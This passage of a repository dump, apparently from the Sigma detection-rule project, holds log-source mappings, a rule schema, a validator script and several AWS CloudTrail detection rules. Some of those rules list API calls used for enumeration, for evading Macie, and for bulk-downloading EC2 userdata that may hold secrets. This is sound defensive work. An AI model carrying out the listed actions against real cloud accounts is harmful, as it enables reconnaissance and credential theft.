codeintegrity-operational\n        sources:\n            - \"WinEventLog:Microsoft-Windows-CodeIntegrity/Operational\"\n    windows-applocker:\n        product: windows\n        service: applocker\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppLocker/MSI and Script'\n            - 'WinEventLog:Microsoft-Windows-AppLocker/EXE and DLL'\n            - 'WinEventLog:Microsoft-Windows-AppLocker/Packaged app-Deployment'\n            - 'WinEventLog:Microsoft-Windows-AppLocker/Packaged app-Execution'\n    windows-msexchange-management:\n        product: windows\n        service: msexchange-management\n        sources:\n            - 'WinEventLog:MSExchange Management'\n    windows-defender:\n        product: windows\n        service: windefend\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Windows Defender/Operational'\n    windows-defender-antivirus-mapping:\n        category: antivirus\n        conditions:\n            EventID:  # https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus IDs with existing 'Threat Name' or 'Path'\n                - 1006\n                - 1007\n                - 1008\n                - 1009\n                - 1010\n                - 1011\n                - 1012\n                - 1017\n                - 1018\n                - 1019\n                - 1115\n                - 1116\n        rewrite:\n            product: windows\n            service: windefend\n        fieldmappings:\n            Signature: ThreatName\n            Filename: Path\n    windows-firewall-advanced-security:\n        product: windows\n        service: firewall-as\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Windows Firewall With Advanced Security/Firewall'\n    windows-bits-client:\n        product: windows\n        service: bits-client\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Bits-Client/Operational'\n    
windows-security-mitigations:\n        product: windows\n        service: security-mitigations\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Security-Mitigations/Kernel Mode'\n            - 'WinEventLog:Microsoft-Windows-Security-Mitigations/User Mode'\n    windows-diagnosis:\n        product: windows\n        service: diagnosis-scripted\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Diagnosis-Scripted/Operational'\n    windows-shell-core:\n        product: windows\n        service: shell-core\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Shell-Core/Operational'\n    windows-openssh:\n        product: windows\n        service: openssh\n        sources:\n            - 'WinEventLog:OpenSSH/Operational'\n    windows-ldap-debug:\n        product: windows\n        service: ldap\n        sources:\n            - 'WinEventLog:Microsoft-Windows-LDAP-Client/Debug'\n    windows-bitlocker:\n        product: windows\n        service: bitlocker\n        sources:\n            - 'WinEventLog:Microsoft-Windows-BitLocker/BitLocker Management'\n    windows-vhdmp:\n        product: windows\n        service: vhdmp\n        sources:\n            - 'WinEventLog:Microsoft-Windows-VHDMP/Operational'\n    windows-appxdeployment-server:\n        product: windows\n        service: appxdeployment-server\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppXDeploymentServer/Operational'\n    windows-lsa-server:\n        product: windows\n        service: lsa-server\n        sources:\n            - 'WinEventLog:Microsoft-Windows-LSA/Operational'\n    windows-appxpackaging-om:\n        product: windows\n        service: appxpackaging-om\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppxPackaging/Operational'\n    windows-dns-client:\n        product: windows\n        service: dns-client\n        sources:\n            - 'WinEventLog:Microsoft-Windows-DNS Client Events/Operational'\n    windows-appmodel-runtime:\n  
      product: windows\n        service: appmodel-runtime\n        sources:\n            - 'WinEventLog:Microsoft-Windows-AppModel-Runtime/Admin'\n    windows-capi2:\n        product: windows\n        service: capi2\n        sources:\n            - 'WinEventLog:Microsoft-Windows-CAPI2/Operational'\n    windows-certificateservicesclient-lifecycle:\n        product: windows\n        service: certificateservicesclient-lifecycle-system\n        sources:\n            - 'WinEventLog:Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational'\n    windows-kernel-shimengine:\n        product: windows\n        service: kernel-shimengine\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Kernel-ShimEngine/Operational'\n            - 'WinEventLog:Microsoft-Windows-Kernel-ShimEngine/Diagnostic'\n    windows-application-experience:\n        product: windows\n        service: application-experience\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Application-Experience/Program-Telemetry'\n            - 'WinEventLog:Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant'\n    windows-ntfs:\n        product: windows\n        service: ntfs\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Ntfs/Operational'\n    windows-hyper-v-worker:\n        product: windows\n        service: hyper-v-worker\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Hyper-V-Worker'\n    windows-kernel-event-tracing:\n        product: windows\n        service: kernel-event-tracing\n        sources:\n            - 'WinEventLog:Microsoft-Windows-Kernel-EventTracing'\n    windows-sense:\n        product: windows\n        service: sense\n        sources:\n            - 'WinEventLog:Microsoft-Windows-SENSE/Operational'\n    windows-servicebus:\n        product: windows\n        service: servicebus-client\n        sources:\n            - 'WinEventLog:Microsoft-ServiceBus-Client/Admin'\n            - 
'WinEventLog:Microsoft-ServiceBus-Client/Operational'\n    windows-iis-configuration:\n        product: windows\n        service: iis-configuration\n        sources:\n            - 'WinEventLog:Microsoft-IIS-Configuration/Operational'\n    apache:\n        category: webserver\n        sources:\n            - \"File:/var/log/apache/*.log\"\n            - \"File:/var/log/apache2/*.log\"\n            - \"File:/var/log/httpd/*.log\"\n    linux-auth:\n        product: linux\n        service: auth\n        sources:\n            - \"File:/var/log/auth.log\"\n            - \"File:/var/log/auth.log.?\"\n    linux-syslog:\n        product: linux\n        service: syslog\n        sources:\n            - \"File:/var/log/syslog\"\n            - \"File:/var/log/syslog.?\"\n    logfiles:\n        category: logfile\n        sources:\n            - \"File:*.log\"\n    logfiles-appliances:\n        category: appliance\n        sources:\n            - \"File:*.log\"\n"
  },
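What the thor.yml mapping above does when a generic rule is resolved, shown as an added example (this is not THOR's or sigmac's own code). A small, constructed subset of tests/thor.yml is transcribed as a Python dict so it runs offline; the resolution steps (match an entry on the selectors it declares, rewrite product/service, add the EventID conditions, rename fields through fieldmappings, then look up the channels for the rewritten logsource) are the ones the config's layout implies, not a documented THOR API. It shows the point a practitioner usually misses: a single process_creation rule becomes two queries, a Sysmon one keeping Image and a Security 4688 one using NewProcessName.

```python
"""Added example, not THOR's or sigmac's code: resolve a generic Sigma logsource
against a thor.yml-style mapping (subset transcribed from tests/thor.yml)."""
from typing import Any

MAPPING: dict[str, dict[str, Any]] = {
    # generic categories -> concrete Windows channels
    "process_creation_1": {
        "category": "process_creation", "product": "windows",
        "conditions": {"EventID": 1},
        "rewrite": {"product": "windows", "service": "sysmon"},
    },
    "process_creation_2": {
        "category": "process_creation", "product": "windows",
        "conditions": {"EventID": 4688},
        "rewrite": {"product": "windows", "service": "security"},
        "fieldmappings": {"Image": "NewProcessName", "ParentImage": "ParentProcessName"},
    },
    "windows-defender-antivirus-mapping": {
        "category": "antivirus",
        "conditions": {"EventID": [1006, 1007, 1116]},
        "rewrite": {"product": "windows", "service": "windefend"},
        "fieldmappings": {"Signature": "ThreatName", "Filename": "Path"},
    },
    # concrete product/service -> event log channels
    "windows-sysmon": {"product": "windows", "service": "sysmon",
                       "sources": ["WinEventLog:Microsoft-Windows-Sysmon/Operational"]},
    "windows-security": {"product": "windows", "service": "security",
                         "sources": ["WinEventLog:Security"]},
    "windows-defender": {"product": "windows", "service": "windefend",
                         "sources": ["WinEventLog:Microsoft-Windows-Windows Defender/Operational"]},
}
SELECTORS = ("category", "product", "service")


def _matches(entry: dict, logsource: dict) -> bool:
    """An entry applies when every selector it declares equals the rule's value."""
    return all(entry[k] == logsource.get(k) for k in SELECTORS if k in entry)


def _map_field(name: str, fieldmappings: dict) -> str:
    """Rename the base field but keep Sigma modifiers such as '|endswith'."""
    base, sep, mods = name.partition("|")
    return fieldmappings.get(base, base) + sep + mods


def resolve(logsource: dict, detection: dict) -> list[dict]:
    """Expand one generic rule into concrete per-channel queries.

    Map-style selections only. Each result carries the rewritten logsource, the
    channels to read, the extra EventID conditions and the renamed detection.
    """
    generic = [e for e in MAPPING.values() if "rewrite" in e and _matches(e, logsource)]
    if not generic:  # already a concrete product/service rule: keep it as is
        generic = [{"rewrite": dict(logsource), "conditions": {}}]
    results = []
    for entry in generic:
        target = entry["rewrite"]
        fm = entry.get("fieldmappings", {})
        selections = {
            name: {_map_field(f, fm): v for f, v in sel.items()}
            for name, sel in detection.items() if name != "condition"
        }
        sources = [s for e in MAPPING.values()
                   if "sources" in e and _matches(e, target) for s in e["sources"]]
        results.append({
            "logsource": target,
            "sources": sources,
            "conditions": dict(entry.get("conditions", {})),
            "detection": {**selections, "condition": detection["condition"]},
        })
    return results


if __name__ == "__main__":
    # constructed rule fragment: dllhost.exe spawned by cmd.exe
    rule_logsource = {"category": "process_creation", "product": "windows"}
    rule_detection = {"sel": {"Image|endswith": "\\dllhost.exe",
                              "ParentImage|endswith": "\\cmd.exe"}, "condition": "sel"}
    for query in resolve(rule_logsource, rule_detection):
        print(query["sources"], query["conditions"], query["detection"]["sel"])
```

A rule that already names a concrete product/service (for example windows/security) passes through untouched and only gains its channel list, which is the fallback branch in `resolve`; a category with no mapping entry yields no channels, which is the signal that the mapping needs a new entry.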
  {
    "path": "tests/validate-sigma-schema/sigma-schema.json",
    "content": "{\n  \"$schema\": \"https://json-schema.org/draft/2020-12/schema#\",\n  \"title\": \"Sigma rule specification V2.0.0 (2024-08-08)\",\n  \"type\": \"object\",\n  \"required\": [\"title\", \"logsource\", \"detection\"],\n  \"properties\": {\n    \"title\": {\n      \"type\": \"string\",\n      \"maxLength\": 256,\n      \"description\": \"A brief title for the rule that should contain what the rules is supposed to detect\"\n    },\n    \"id\": {\n      \"type\": \"string\",\n      \"description\": \"A globally unique identifier for the Sigma rule. This is recommended to be a UUID v4, but not mandatory.\",\n      \"format\": \"uuid\"\n    },\n    \"related\": {\n      \"type\": \"array\",\n      \"description\": \"A list of related Sigma rules to keep track of the relationships between detections. This can be used to indicate that a rule is derived from another rule, or that a rule has been obsoleted by another rule.\",\n      \"items\": {\n        \"type\": \"object\",\n        \"required\": [\"id\", \"type\"],\n        \"properties\": {\n          \"id\": {\n            \"type\": \"string\",\n            \"description\": \"A globally unique identifier for the Sigma rule. This is recommended to be a UUID v4, but not mandatory.\",\n            \"format\": \"uuid\"\n          },\n          \"type\": {\n            \"type\": \"string\",\n            \"oneOf\": [\n              {\n                \"const\": \"derived\",\n                \"description\": \"The rule was derived from the referred rule or rules, which may remain active\"\n              },\n              {\n                \"const\": \"obsolete\",\n                \"description\": \"The rule obsoletes the referred rule or rules, which aren't used anymore\"\n              },\n              {\n                \"const\": \"merged\",\n                \"description\": \"The rule was merged from the referred rules. 
The rules may be still existing and in use\"\n              },\n              {\n                \"const\": \"renamed\",\n                \"description\": \"The rule had previously the referred identifier or identifiers but was renamed for whatever reason, e.g. from a private naming scheme to UUIDs, to resolve collisions etc. It's not expected that a rule with this id exists anymore\"\n              },\n              {\n                \"const\": \"similar\",\n                \"description\": \"Use to relate similar rules to each other (e.g. same detection content applied to different log sources, rule that is a modified version of another rule with a different level)\"\n              }\n            ]\n          }\n        }\n      }\n    },\n    \"name\": {\n      \"type\": \"string\",\n      \"maxLength\": 256,\n      \"description\": \"a unique human-readable name that can be used instead of the id as a reference in correlation rules\"\n    },\n    \"taxonomy\":{\n      \"type\": \"string\",\n      \"maxLength\": 256,\n      \"description\": \"Defines the taxonomy used in the Sigma rule\"\n    },\n    \"status\": {\n      \"type\": \"string\",\n      \"oneOf\": [\n        {\n          \"const\": \"stable\",\n          \"description\": \"The rule didn't produce any obvious false positives in multiple environments over a long period of time\"\n        },\n        {\n          \"const\": \"test\",\n          \"description\": \"The rule doesn't show any obvious false positives on a limited set of test systems\"\n        },\n        {\n          \"const\": \"experimental\",\n          \"description\": \"A new rule that hasn't been tested outside of lab environments and could lead to many false positives\"\n        },\n        {\n          \"const\": \"deprecated\",\n          \"description\": \"The rule was replaced or is now covered by another one. 
The link between both rules is made via the `related` field\"\n        },\n        {\n          \"const\": \"unsupported\",\n          \"description\": \"The rule can not be used in its current state (special correlation log, home-made fields, etc.)\"\n        }\n      ]\n    },\n    \"description\": {\n      \"type\": \"string\",\n      \"description\": \"A short description of the rule and the malicious activity that can be detected\",\n      \"maxLength\": 65535\n    },\n    \"license\": {\n      \"type\": \"string\",\n      \"description\": \"License of the rule according the SPDX ID specification (https://spdx.dev/ids/)\"\n    },\n    \"author\": {\n      \"type\": \"string\",\n      \"description\": \"Creator of the rule. (can be a name, nickname, twitter handle, etc.)\"\n    },\n    \"references\": {\n      \"type\": \"array\",\n      \"description\": \"References to the source that the rule was derived from. These could be blog articles, technical papers, presentations or even tweets\",\n      \"uniqueItems\": true,\n      \"items\": {\n        \"type\": \"string\"\n      }\n    },\n    \"date\": {\n      \"type\": \"string\",\n      \"description\": \"Creation date of the rule. Use the ISO 8601 format YYYY-MM-DD\",\n      \"pattern\": \"^\\\\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])$\"\n    },\n    \"modified\": {\n      \"type\": \"string\",\n      \"description\": \"Last modification date of the rule. 
Use the ISO 8601 format YYYY-MM-DD\",\n      \"pattern\": \"^\\\\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])$\"\n    },\n    \"logsource\": {\n      \"type\": \"object\",\n      \"description\": \"The log source that the rule is supposed to detect malicious activity in.\",\n      \"properties\": {\n        \"category\": {\n          \"description\": \"Group of products, like firewall or process_creation\",\n          \"type\": \"string\"\n        },\n        \"product\": {\n          \"description\": \"A certain product, like windows\",\n          \"type\": \"string\"\n        },\n        \"service\": {\n          \"description\": \"A subset of a product's logs, like sshd\",\n          \"type\": \"string\"\n        },\n        \"definition\":{\n          \"description\": \"can be used to describe the log source\",\n          \"type\": \"string\"\n        }\n      }\n    },\n    \"detection\": {\n      \"type\": \"object\",\n      \"required\": [\"condition\"],\n      \"description\": \"A set of search-identifiers that represent properties of searches on log data\",\n      \"additionalProperties\": {\n        \"description\": \"A Search Identifier: A definition that can consist of two different data structures - lists and maps.\",\n        \"anyOf\": [\n          {\n            \"type\": \"array\",\n            \"items\": {\n              \"anyOf\": [\n                {\n                  \"type\": \"string\"\n                },\n                {\n                  \"type\": \"integer\"\n                },\n                {\n                  \"type\": \"object\",\n                  \"items\": {\n                    \"type\": \"string\"\n                  }\n                }\n              ]\n            }\n          },\n          {\n            \"type\": \"object\",\n            \"items\": {\n              \"type\": \"string\"\n            }\n          }\n        ]\n      },\n      \"properties\": {\n        \"condition\": {\n          \"type\": \"string\",\n  
        \"description\": \"The relationship between the search identifiers to create the detection logic. Ex: selection1 or selection2\"\n        }\n      }\n    },\n    \"fields\": {\n      \"type\": \"array\",\n      \"description\": \"A list of log fields that could be interesting in further analysis of the event and should be displayed to the analyst\",\n      \"uniqueItems\": true,\n      \"items\": {\n        \"type\": \"string\"\n      }\n    },\n    \"falsepositives\": {\n      \"description\": \"A list of known false positives that may occur\",\n      \"uniqueItems\": true,\n      \"anyOf\": [\n        {\n          \"type\": \"string\",\n          \"minLength\": 2\n        },\n        {\n          \"type\": \"array\",\n          \"items\": {\n            \"type\": \"string\",\n            \"minLength\": 2\n          }\n        }\n      ]\n    },\n    \"level\": {\n      \"type\": \"string\",\n      \"description\": \"The criticality of a triggered rule\",\n      \"oneOf\": [\n        {\n          \"const\": \"informational\",\n          \"description\": \"Rule is intended for enrichment of events, e.g. by tagging them. No case or alerting should be triggered by such rules because it is expected that a huge amount of events will match these rules\"\n        },\n        {\n          \"const\": \"low\",\n          \"description\": \"Notable event but rarely an incident. Low rated events can be relevant in high numbers or combination with others. 
Immediate reaction shouldn't be necessary, but a regular review is recommended\"\n        },\n        {\n          \"const\": \"medium\",\n          \"description\": \"Relevant event that should be reviewed manually on a more frequent basis\"\n        },\n        {\n          \"const\": \"high\",\n          \"description\": \"Relevant event that should trigger an internal alert and requires a prompt review\"\n        },\n        {\n          \"const\": \"critical\",\n          \"description\": \"Highly relevant event that indicates an incident. Critical events should be reviewed immediately. It is used only for cases in which probability borders certainty\"\n        }\n      ]\n    },\n    \"tags\": {\n      \"description\": \"Tags to categorize a Sigma rule.\",\n      \"type\": \"array\",\n      \"uniqueItems\": true,\n      \"items\": {\n        \"type\": \"string\",\n        \"pattern\": \"^[a-z0-9_-]+\\\\.[a-z0-9._-]+$\"\n      }\n    },\n    \"scope\":{\n      \"description\": \"A list of intended scope of the rule\",\n      \"type\": \"array\",\n          \"items\": {\n            \"type\": \"string\",\n            \"minLength\": 2\n          }\n    }\n  }\n}\n"
  },
  {
    "path": "tests/validate-sigma-schema/validate.py",
    "content": "#!/usr/bin/env python3\n\nimport os\nimport sys\nimport requests\nimport warnings\n\nfrom pathlib import Path\nfrom typing import Any, Dict, Iterator, List, NoReturn\n\n\ndef get_envs() -> Dict[str, Any]:\n    \"\"\"Normalize the environment variables used by the action and returns them as a dictionary.\n\n    Returns:\n        Dict[str, Any]: A dictionary containing the environment variables used by the action.\n    \"\"\"\n\n    github_workspace = Path(os.environ.get(\"GITHUB_WORKSPACE\", \"./\"))\n    github_action_path = os.environ.get(\"GITHUB_ACTION_PATH\")\n    if not github_action_path:\n        github_action_path = github_workspace\n    else:\n        github_action_path = Path(github_action_path)\n\n    sigma_rules_path = os.environ.get(\"SIGMA_RULES_PATH\")\n\n    # If SIGMA_RULES_PATH is not set, use GITHUB_WORKSPACE as a fallback\n    if not sigma_rules_path:\n        sigma_rules_path = [github_workspace]\n    else:\n        # Split the SIGMA_RULES_PATH by newlines and remove empty strings\n        sigma_rules_path = [\n            github_workspace / Path(path.strip())\n            for path in sigma_rules_path.splitlines(True)\n            if path\n        ]\n\n    # If SIGMA_SCHEMA_FILE is not set, use SIGMA_SCHEMA_URL as a fallback to\n    # download the schema file from sigma-specification repository\n    sigma_schema_file = os.environ.get(\"SIGMA_SCHEMA_FILE\")\n    sigma_schema_url = os.environ.get(\n        \"SIGMA_SCHEMA_URL\",\n        \"https://raw.githubusercontent.com/SigmaHQ/sigma-specification/main/sigma-schema.json\",\n    )\n\n    return {\n        \"GITHUB_WORKSPACE\": github_workspace,\n        \"GITHUB_ACTION_PATH\": github_action_path,\n        \"SIGMA_RULES_PATH\": sigma_rules_path,\n        \"SIGMA_SCHEMA_FILE\": sigma_schema_file,\n        \"SIGMA_SCHEMA_URL\": sigma_schema_url,\n    }\n\n\ndef generate_all_files(\n    root: Path,\n    extensions: List[str] = [\".yml\"],  # TODO: Add support for multiple 
extensions\n    excludes: List[str] = list(),  # TODO: Add support for excludes\n) -> Iterator[Path]:\n    \"\"\"Generates all files with the given extensions in the given root directory.\n\n    Args:\n        root (Path): Root directory to start the search.\n        extensions (List[str], optional): Extensions to search for. Defaults to [\".yml\"].\n\n    Yields:\n        Iterator[Path]: Yields all files with the given extensions in the given root directory.\n    \"\"\"\n\n    for path in root.rglob(\"*\"):\n        # NOTE: path.is_file() is used to skip directories, however it will also\n        # skip symlinks to files and these symlinked files might reside in inaccessible\n        # directories, hence it'll raise a PermissionError. This is why it is run\n        # using sudo in the action.yml file. If running as sudo is not an option,\n        # the code can be modified to catch the PermissionError and skip the file.\n        try:\n            if not path.is_file() or any([path.match(ex) for ex in excludes]):\n                continue\n        except PermissionError:\n            warnings.warn(f\"PermissionError: Could not access {path}, skipping file\")\n            continue\n\n        if path.suffix in extensions:\n            yield path\n\n\ndef get_rules(sigma_rules_path: List[Path]) -> List[str] | NoReturn:\n    \"\"\"Get all rules from the given paths.\n\n    Args:\n        sigma_rules_path (List[Path]): List of paths to search for rules.\n\n    Returns:\n        List[str] | NoReturn: List of rules or exit the script if no rules are found.\n    \"\"\"\n\n    rules = list()\n    for path in sigma_rules_path:\n        for file in generate_all_files(Path(path)):\n            rules.append(str(file.resolve().absolute()))\n\n    if len(rules) == 0:\n        warnings.warn(\"No rules found, skipping validation\")\n        os._exit(-1)\n\n    return rules\n\n\ndef download_schema_file(envs: Dict[str, Any]) -> Path | NoReturn:\n    \"\"\"Download the schema file 
from the given URL and return its path.\n\n    Args:\n        envs (Dict[str, Any]): A dictionary containing the environment variables\n            used by the action.\n\n    Returns:\n        Path | NoReturn: Path to the schema file or exit the script if\n            the file could not be downloaded.\n    \"\"\"\n\n    schema_file = envs[\"SIGMA_SCHEMA_FILE\"]\n    schema_url = envs[\"SIGMA_SCHEMA_URL\"]\n    if not schema_file:\n        schema_file = envs[\"GITHUB_WORKSPACE\"] / \"sigma-schema.json\"\n    else:\n        schema_file = Path(schema_file)\n        if not schema_file.exists():\n            schema_file = envs[\"GITHUB_WORKSPACE\"] / schema_file\n\n    if not schema_file.exists():\n        response = requests.get(schema_url)\n        if response.status_code == 200:\n            with open(schema_file, \"wb\") as f:\n                f.write(response.content)\n        else:\n            warnings.warn(\n                f\"Failed to download schema file {schema_file}, skipping validation\"\n            )\n            os._exit(-1)\n    return (envs[\"GITHUB_WORKSPACE\"] / schema_file).absolute()\n\n\ndef help() -> None:\n    \"\"\"Prints a help message with the available commands and their descriptions.\n\n    Returns:\n        None\n    \"\"\"\n    print(\"Please provide one of the following commands:\")\n    print(\"  rules: Get all rules and return them as a string separated by spaces\")\n    print(\"  schema: Download schema file and return its path\")\n    print(\"  envs: Print all environment variables used by the action\")\n    print(\"  help: Print this help message\")\n\n\nif __name__ == \"__main__\":\n    \"\"\"Main entry point of the script.\"\"\"\n\n    if len(sys.argv) < 2:\n        print(\"No arguments provided.\")\n        help()\n        os._exit(-1)\n\n    envs = get_envs()\n    if sys.argv[1] == \"rules\":\n        print(\" \".join(get_rules(envs[\"SIGMA_RULES_PATH\"])))\n    elif sys.argv[1] == \"schema\":\n        
print(download_schema_file(envs))\n    elif sys.argv[1] == \"help\":\n        help()\n    elif sys.argv[1] == \"envs\":\n        for key, value in envs.items():\n            print(f\"{key}: {value}\")\n    else:\n        print(f\"Unknown command: {sys.argv[1]}\")\n        help()\n        os._exit(-1)\n"
  },
  {
    "path": "unsupported/README.md",
    "content": "TBD"
  },
  {
    "path": "unsupported/cloud/aws_ec2_download_userdata.yml",
    "content": "title: AWS EC2 Download Userdata\nid: 26ff4080-194e-47e7-9889-ef7602efed0c\nstatus: unsupported\ndescription: Detects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.\nreferences:\n    - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py\nauthor: faloker\ndate: 2020/02/11\nmodified: 2023/03/24\ntags:\n    - attack.exfiltration\n    - attack.t1020\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_source:\n        eventSource: ec2.amazonaws.com\n        requestParameters.attribute: userData\n        eventName: DescribeInstanceAttribute\n    timeframe: 30m\n    condition: selection_source | count() > 10\nfalsepositives:\n    - Assets management software like device42\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_backup.yml",
    "content": "title: Potential Backup Enumeration on AWS\nid: 76255e09-755e-4675-8b6b-dbce9842cd2a\nstatus: unsupported\ndescription: Detects potential enumeration activity targeting AWS instance backups\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/13\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1580\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName:\n            - 'GetPasswordData'\n            - 'GetEbsEncryptionByDefault'\n            - 'GetEbsDefaultKmsKeyId'\n            - 'GetBucketReplication'\n            - 'DescribeVolumes'\n            - 'DescribeVolumesModifications'\n            - 'DescribeSnapshotAttribute'\n            - 'DescribeSnapshotTierStatus'\n            - 'DescribeImages'\n    timeframe: 10m\n    condition: selection | count() > 5\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_listing.yml",
    "content": "title: Account Enumeration on AWS\nid: e9c14b23-47e2-4a8b-8a63-d36618e33d70\nstatus: unsupported\ndescription: Detects enumeration of account configuration via API calls that list different instances and services within a short period of time.\nauthor: toffeebr33k\ndate: 2020/11/21\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1592\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection_eventname:\n        eventName: list*\n    timeframe: 10m\n    condition: selection_eventname | count() > 50\nfields:\n    - userIdentity.arn\nfalsepositives:\n    - AWS Config or other configuration scanning activities\nlevel: low\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_network.yml",
    "content": "title: Potential Network Enumeration on AWS\nid: c3d53999-4b14-4ddd-9d9b-e618c366b54d\nstatus: unsupported\ndescription: Detects network enumeration performed on AWS.\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/13\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1016\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 'ec2.amazonaws.com'\n        eventName:\n            - 'DescribeCarrierGateways'\n            - 'DescribeVpcEndpointConnectionNotifications'\n            - 'DescribeTransitGatewayMulticastDomains'\n            - 'DescribeClientVpnRoutes'\n            - 'DescribeDhcpOptions'\n            - 'GetTransitGatewayRouteTableAssociations'\n    timeframe: 10m\n    condition: selection | count() > 5\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "unsupported/cloud/aws_enum_storage.yml",
    "content": "title: Potential Storage Enumeration on AWS\nid: 4723218f-2048-41f6-bcb0-417f2d784f61\nrelated:\n    - id: f305fd62-beca-47da-ad95-7690a0620084\n      type: similar\nstatus: unsupported\ndescription: Detects potential enumeration activity targeting AWS storage\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/13\nmodified: 2023/03/24\ntags:\n    - attack.discovery\n    - attack.t1619\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventSource: 's3.amazonaws.com'\n        eventName:\n            - 'ListBuckets'\n            - 'GetBucketCors'\n            - 'GetBucketInventoryConfiguration'\n            - 'GetBucketPublicAccessBlock'\n            - 'GetBucketMetricsConfiguration'\n            - 'GetBucketPolicy'\n            - 'GetBucketTagging'\n    timeframe: 10m\n    condition: selection | count() > 5\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_lambda_function_created_or_invoked.yml",
    "content": "title: AWS Lambda Function Created or Invoked\nid: d914951b-52c8-485f-875e-86abab710c0b\nstatus: unsupported\ndescription: Detects when a user creates or invokes a lambda function.\nreferences:\n    - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/\nauthor: Austin Songer @austinsonger\ndate: 2021/10/03\nmodified: 2023/03/24\ntags:\n    - attack.privilege_escalation\n    - attack.t1078\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection1:\n        eventSource: lambda.amazonaws.com\n        eventName: CreateFunction\n    selection2:\n        eventSource: lambda.amazonaws.com\n        eventName: Invoke\n    condition: selection1 | near selection2\nfalsepositives:\n    - Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.\n    - If known behavior is causing false positives, it can be exempted from the rule.\nlevel: low\n"
  },
  {
    "path": "unsupported/cloud/aws_macic_evasion.yml",
    "content": "title: AWS Macie Evasion\nid: 91f6a16c-ef71-437a-99ac-0b070e3ad221\nstatus: unsupported\ndescription: Detects attempts to evade Macie detection.\nreferences:\n    - https://docs.aws.amazon.com/cli/latest/reference/macie/\nauthor: Sittikorn S\ndate: 2021/07/06\nmodified: 2023/03/24\ntags:\n    - attack.defense_evasion\n    - attack.t1562.001\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection:\n        eventName:\n            - 'ArchiveFindings'\n            - 'CreateFindingsFilter'\n            - 'DeleteMember'\n            - 'DisassociateFromMasterAccount'\n            - 'DisassociateMember'\n            - 'DisableMacie'\n            - 'DisableOrganizationAdminAccount'\n            - 'UpdateFindingsFilter'\n            - 'UpdateMacieSession'\n            - 'UpdateMemberSession'\n            - 'UpdateClassificationJob'\n    timeframe: 10m\n    condition: selection | count() by sourceIPAddress > 5\nfields:\n    - sourceIPAddress\n    - userIdentity.arn\nfalsepositives:\n    - System or Network administrator behaviors\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/aws_ses_messaging_enabled.yml",
    "content": "title: Potential AWS Cloud Email Service Abuse\nid: 60b84424-a724-4502-bd0d-cc676e1bc90e\nstatus: unsupported\ndescription: Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession\nreferences:\n    - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/\nauthor: Janantha Marasinghe\ndate: 2022/12/12\nmodified: 2023/03/24\ntags:\n    - attack.t1583.006\n    - attack.resource_development\nlogsource:\n    product: aws\n    service: cloudtrail\ndetection:\n    selection1:\n        eventSource: 'ses.amazonaws.com'\n        eventName: 'UpdateAccountSendingEnabled'\n    selection2:\n        eventSource: 'ses.amazonaws.com'\n        eventName: 'VerifyEmailIdentity'\n    timeframe: 5m\n    condition: selection1 and selection2 # We don't combine them in one selection because we want to correlate both events\nfalsepositives:\n    - Legitimate SES configuration activity\nlevel: medium\n"
  },
  {
    "path": "unsupported/cloud/azure_aad_secops_signin_failure_bad_password_threshold.yml",
